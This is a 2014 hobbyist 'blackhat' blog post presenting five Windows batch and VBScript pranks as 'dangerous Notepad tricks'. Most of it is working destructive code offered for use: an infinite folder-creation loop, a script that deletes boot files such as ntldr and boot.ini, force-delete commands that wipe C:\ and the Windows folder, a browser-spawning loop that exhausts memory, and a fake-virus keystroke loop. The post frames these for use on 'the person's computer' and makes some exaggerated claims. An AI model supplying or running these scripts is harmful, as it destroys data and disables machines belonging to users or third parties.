badge Top 5 Dangerous Notepad Tricks.
Posted by : Unknown Saturday 16 August 2014


SOME DANGEROUS AND DEADLY  TRICKS.


[CAUTION]
DO NOT TRY THESE FOR FUN!! THIS CAN DAMAGE YOUR PC .


1. How to create more than 3,000 folders under a minute.

1) Open your notepad and type the following code.
@echo off
:top
md %random%

goto top
2) Save it as file.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop..
 ———————————————————————————
——————————————————–


2. How to Shutdown a computer forever?

Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It
with Extension .cmd or .bat.

———————————————————————————
——————————————————–
3. How to Delete all files with a small command!

Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5mins.
———————————————————————————
——————————————————–
4. Ram crashing trick

open notepad and type
:A
start http://theblackhatcrew.blogspot.in/
goto A

save with .bat extension.
Infinitely loops your browser to
open up http://theblackhatcrew.blogspot.in/
________________________________________________
_________________________________________
5. Make Keyboard Automatic

open note pad and type
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop

And Save it as .vbs .
here vbs means visual basic script.
Edit This is a Virus. You have been infected. to your wish.
_________________________________________________________________________
ENJOY.

LIKE US ON FB

Popular Post

Copyright © BLACKHAT CREW|| Edited by N1H4R